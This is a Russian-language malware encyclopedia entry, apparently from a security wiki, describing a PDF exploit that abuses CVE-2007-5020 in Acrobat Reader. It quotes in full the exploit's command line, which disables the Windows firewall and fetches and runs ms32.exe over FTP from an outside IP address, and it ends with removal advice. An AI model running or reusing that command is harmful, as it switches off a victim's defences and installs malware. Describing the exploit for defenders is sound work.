Exploit.Win32.PDF-URI.k

Материал из Total Malware Info

Перейти к: навигация, поиск

Exploit.Win32.PDF-URI.k Программа-эксплоит, использующая незакрытую уязвимость в Acrobat Reader, для выполнения произвольного кода на WinXP. Является документом PDF. Имеет размер 3850 байт.

Деструктивная активность

Используя уязвимость CVE-2007-5020 в теге /URI программа может выполнить любую команду командного интерпретатора на машине жертвы.

Данная модификация вредоносной программы выполняет следующую команду: 

^System%/cmd.exe /c /q @netsh firewall set opmode mode=disable&@echo o 203.121.69.116>7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe

Данная команда отключает встроенный брандмауэр Windows. Создает файл с именем “7” в папке %System% и записывает в него сценарий загрузки следующего файла: 

ftp://203.******.116/ms32.exe (на момент написания описания ссылка не работала)

используя утилиту FTP, после чего запускает закачку. Файл сохраняется как: 

%System%\ms32.exe

и запускается на выполнение.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл вредоносной программы (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить файл:
    3. %System%\ms32.exe
Источник — «http://www.totalmalwareinfo.com/rus/Exploit.Win32.PDF-URI.k»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.